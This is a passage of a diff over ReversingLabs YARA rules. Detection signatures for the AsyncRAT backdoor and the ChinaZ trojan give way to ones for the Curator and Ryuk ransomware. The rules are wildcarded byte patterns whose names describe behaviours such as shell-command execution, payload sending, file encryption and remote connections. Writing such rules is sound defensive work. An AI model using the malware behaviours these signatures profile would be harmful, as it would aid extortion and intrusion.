+            ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6
+            45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $connect_proxy_p* ) ) and ( $send_payload ) and ( $execute_shell_command )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Asyncrat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win64_Ransomware_Curator : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects AsyncRAT backdoor."
+		description = "Yara rule that detects Curator ransomware."
 		author = "ReversingLabs"
-		id = "78ff36e1-1620-50f4-8abd-adcf8b1242da"
-		date = "2024-05-22"
-		modified = "2024-05-22"
+		id = "401f1d64-afd9-55b1-8e87-b808d4679e9a"
+		date = "2021-04-22"
+		modified = "2021-04-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.AsyncRAT.yara#L1-L149"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Curator.yara#L1-L94"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "53a13975cd53b571910f951adc44707c11b86c003eeb7b88dbe701253645ac89"
+		logic_hash = "8bd29195cea0f1194e27c48ed07c52100abb7dd3de2ef7f51a645d32c3527eb3"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "AsyncRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Curator"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$read_server_data_v1 = {
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 28 ??
-            ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0A 06 16 3E ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 06 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 6A 59 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 3A ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6A 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 16 6A 3E ?? ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ?? ?? ??
-            ?? 69 6F ?? ?? ?? ?? 0B 07 16 3D ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 07 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 6A 59 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 16 6A 3C ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 30 ??
-            14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 16 6A 28 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 38 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 3C ?? ?? ?? ?? 16
-            28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ??
-            ?? ?? ?? 69 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 38 ?? ??
-            ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD
-        }
-		$send_v1 = {
-            28 ?? ?? ?? ?? 0A 16 0B 06 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DD ??
-            ?? ?? ?? 02 8E 69 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ??
-            ?? ?? 08 16 08 8E 69 6F ?? ?? ?? ?? 02 8E 69 20 ?? ?? ?? ?? 3E ?? ?? ?? ?? 02 73 ??
-            ?? ?? ?? 0D 16 13 ?? 09 16 6A 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 38
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25
-            13 ?? 16 30 ?? DD ?? ?? ?? ?? 09 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ??
-            15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 07 39 ?? ?? ?? ??
-            06 28 ?? ?? ?? ?? DC
-        }
-		$read_packet_v1_p1 = {
-            73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 02 74 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B
-            07 28 ?? ?? ?? ?? 0C 08 20 4F 01 89 64 42 ?? ?? ?? ?? 08 20 7A 39 BA 13 42 ?? ?? ??
-            ?? 08 20 D4 CA CD 0C 3B ?? ?? ?? ?? 08 20 7A 39 BA 13 3B ?? ?? ?? ?? 38 ?? ?? ?? ??
-            08 20 2B C2 32 1B 3B ?? ?? ?? ?? 08 20 E2 A2 F4 57 3B ?? ?? ?? ?? 08 20 4F 01 89 64
-            3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 08 20 5A 15 79 D9 42 ?? ?? ?? ?? 08 20 B7 16 DB 7A 3B
-            ?? ?? ?? ?? 08 20 39 20 3F B2 3B ?? ?? ?? ?? 08 20 5A 15 79 D9 3B ?? ?? ?? ?? 38 ??
-            ?? ?? ?? 08 20 1E CA D2 DC 3B ?? ?? ?? ?? 08 20 45 FD B6 E0 3B ?? ?? ?? ?? 08 20 D0
-            5E 9B FA 3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07
-        }
-		$read_packet_v1_p2 = {
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73 ??
-            ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
-            16 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 06 7B ??
-            ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ??
-            06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 ??
-            6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 12 ?? (FE | 16) ?? ?? ??
-            ?? ?? 6F ?? ?? ?? ?? DC 73 ?? ?? ?? ?? 26 06 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ??
-            73 ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ??
-            7E ?? ?? ?? ?? 25 3A ?? ?? ?? ?? 26 7E ?? ?? ?? ?? (FE | 06) ?? ?? ?? ?? ?? 73
+		$encrypt_files_p1 = {
+            44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF 15 ?? ?? ??
+            ?? 48 8B BD ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D ??
+            ?? ?? ?? 41 8B DC 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 7E ?? 45 33 F6 48 8B
+            05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 0F BE 8C 06 ?? ?? ?? ?? 45 0F
+            BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 8D
+            ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 4D 8D 76 ?? FF C3 41 83 C4 ?? 88 84 0D
+            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44 3B E0 7C
+            ?? 4C 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 E4 48 89 44 24 ?? 48 8D 95 ?? ??
+            ?? ?? 45 33 C9 44 89 64 24 ?? 44 8B C3 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 4C 24 ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ?? ?? ??
+            ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 8D 44 24 ??
+            48 89 44 24 ?? 45 33 C9 48 8D 44 24 ?? 89 9D ?? ?? ?? ?? 33 D2 48 89 44 24 ?? FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 41 8B DC 44 39 A5 ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 4C 04 ?? E8 ?? ?? ?? ?? 48 8D 95 ??
+            ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ?? ?? ?? 72 ?? 48 8B 8D ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ?? B9
         }
-		$send_v2 = {
-            7E ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 16 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ??
-            ?? ?? ?? 39 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 8E
-            B7 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 06 08 16 08 8E B7
-            6F ?? ?? ?? ?? 06 07 16 07 8E B7 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 17 6F ?? ?? ?? ??
-            26 7E ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? B7 16 14 (FE | 06) ?? ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC DE ??
-            25 28 ?? ?? ?? ?? 0D 16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C ?? 11 ??
-            28 ?? ?? ?? ?? DC
+		$encrypt_files_p2 = {
+            48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 55 41 54 41 55 41 56 41 57 48 8D A8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89
+            85 ?? ?? ?? ?? 45 33 E4 C7 44 24 ?? ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 89 25 ?? ?? ??
+            ?? 48 8D 95 ?? ?? ?? ?? 44 89 25 ?? ?? ?? ?? 33 C9 44 89 25 ?? ?? ?? ?? 45 8B FC 4C
+            89 25 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8
+            48 8D 85 ?? ?? ?? ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 66 44 89 20 4C 8D 05
+            ?? ?? ?? ?? 48 83 C0 ?? 4C 89 64 24 ?? 48 89 05 ?? ?? ?? ?? 45 33 C9 48 8D 05 ?? ??
+            ?? ?? 44 89 64 24 ?? 33 D2 48 89 05 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 33 D2 33 C9
+            44 8D 42 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3
+            ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44
+            8B F0 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46
         }
-		$open_url_v2 = {
-            03 39 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 20 00 0C 00 00 28 ?? ?? ?? ?? 20 0F 27 00 00 28
-            ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 02 28 ?? ?? ?? ?? 74 ?? ?? ??
-            ?? 0A 06 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 7E ?? ?? ?? ?? 8E B7 6F ?? ?? ?? ?? 9A 6F ??
-            ?? ?? ?? 06 17 6F ?? ?? ?? ?? 06 20 10 27 00 00 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 0B DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC
-            2B ?? 02 28 ?? ?? ?? ?? 26
+		$find_files = {
+            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B
+            05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9
+            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24
+            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ??
+            ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
+            ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3
+            5D C3
         }
-		$monitoring_v2 = {
-            73 ?? ?? ?? ?? 0C 02 72 ?? ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ??
-            11 ?? 9A 0B 08 07 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E B7 32 ?? 1F ?? 0A 38 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0D 09 6F ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 2C ?? 2B ?? 08 09 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 (FE | 07) ?? ?? ?? ?? ??
-            73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 1F ?? 31 ?? 16 0A 72 ?? ?? ?? ?? 09 6F ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 D6 13 ??
-            11 ?? 11 ?? 8E B7 32 ?? 06 17 D6 0A 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 3A
+		$remote_connection = {
+            44 0F B7 45 ?? 33 DB 48 8B 55 ?? 45 33 C9 48 89 5C 24 ?? 48 8B CE 89 5C 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ??
+            ?? 80 7D ?? ?? B9 ?? ?? ?? ?? 4C 8B 45 ?? B8 ?? ?? ?? ?? 48 8B 55 ?? 0F 44 C8 48 89
+            5C 24 ?? 45 33 C9 89 4C 24 ?? 89 4D ?? 49 8B CE 48 89 5C 24 ?? 48 89 5C 24 ?? FF 15
+            ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 4C 8D 4D ?? 4C 8D 45 ??
+            C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 4D ??
+            ?? ?? ?? ?? 4C 8D 45 ?? 41 B9 ?? ?? ?? ?? 48 8B CB 41 8D 51 ?? FF 15 ?? ?? ?? ?? 4C
+            8B 4D ?? 48 8B C7 48 F7 D8 48 8B D7 8B 45 ?? 48 8B CB 45 1B C0 89 44 24 ?? FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? 33 FF 83 65 ?? ?? 48 8D 55 ?? 45 33 C9 45 33 C0 48 8B CB FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 49 8B CF 03 D7 E8 ?? ?? ?? ?? 44 8B 45 ?? 4C 8D 4D
+            ?? 8B D7 48 8B CB 48 03 D0 4C 8B F8 FF 15 ?? ?? ?? ?? 8B 45 ?? 03 F8 EB ?? 8B 45
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $read_server_data_v1 ) and ( $send_v1 ) and ( all of ( $read_packet_v1_p* ) ) ) or ( ( $send_v2 ) and ( $open_url_v2 ) and ( $monitoring_v2 ) ) )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
 }
-rule REVERSINGLABS_Linux_Trojan_Chinaz : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Ryuk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects ChinaZ trojan."
+		description = "Yara rule that detects Ryuk ransomware."
 		author = "ReversingLabs"
-		id = "f99c224b-db54-5cae-b5fb-8939ebee3250"
-		date = "2024-07-31"
-		modified = "2024-07-31"
+		id = "179c9277-0bdc-522a-a822-cf93febff408"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Trojan.ChinaZ.yara#L1-L246"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ryuk.yara#L1-L199"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d8d08f4f3f36ecc7b219b6b1aae3c76d26e8fb3a44444763929190c6124532ff"
+		logic_hash = "bf93892b281be20917656e242cbb0f3b3694439556b7e5e40a424ba1aa909105"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "ChinaZ"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ryuk"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$collect_system_information_32_p1 = {
-            55 57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
-            ?? 89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 31 C9 89 C6 8D 44 24 ?? 31
-            FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44 24 ?? 11 D3 C7 44 24 ?? ?? ?? ??
-            ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ??
-            29 F1 19 FB 31 ED 2B 44 24 ?? 89 4C 24 ?? 8D B4 24 ?? ?? ?? ?? 89 5C 24 ?? 89 F7 69
-            C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24
-            ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B
-            5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ??
-            8D 9C 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1
-        }
-		$collect_system_information_32_p2 = {
-            C7 04 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89
-            DF B1 ?? F3 AB 89 DF 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 C7 44 24 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 54 24 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 F7 C7 44 24 ?? ?? ?? ?? ?? 89 D0
-            C1 F8 ?? C1 E8 ?? 01 D0 C1 F8 ?? 89 44 24 ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C2 A1 ?? ?? ??
-            ?? 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 DF B1 ?? F3
-            AB 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 0F
-            85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04
